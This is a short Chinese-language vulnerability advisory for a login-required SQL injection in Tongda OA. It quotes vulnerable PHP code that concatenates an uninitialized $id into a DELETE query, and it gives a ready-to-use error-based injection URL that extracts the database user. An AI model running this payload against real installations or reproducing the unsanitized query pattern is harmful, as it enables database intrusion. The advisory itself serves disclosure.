通达OA一个SQL注射漏洞(需登录)

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: 通达OA SQL注射漏洞,需登录。 ### 详细说明: 程序是集成化安装,在php.ini中register_globals设置为on,允许注册全局变量。 在/general/crm/apps/crm/include/deleteView.php文件中$id变量未初始化: ``` include_once( "general/crm/studio/header.php" ); include_once( "inc/utility.php" ); $flag = 0; $query = "delete from crm_sys_list_view where id=".$id; $cursor = exequery( $connection, $query ); ``` 测试语句如下: ``` http://oa.tongda2000.com:81/general/crm/apps/crm/include/deleteView.php?id=1 and (select 1 from (select count(*),concat((select user()),floor(rand(0)*2))x from information_schema.tables group by x)a)%23 ``` [<img src="https://images.seebug.org/upload/201310/28165253e97da98318c69e9575b19ce25d921077.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201310/28165253e97da98318c69e9575b19ce25d921077.png) 在/general/crm/apps/crm/include/delete_submit.php中 ``` ob_end_clean( ); $ATTACHMENT_ID = $_POST['ATTACH_ID']; $ATTACHMENT_NAME = $_POST['ATTACH_NAME']; $ENTITY_NAME =...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息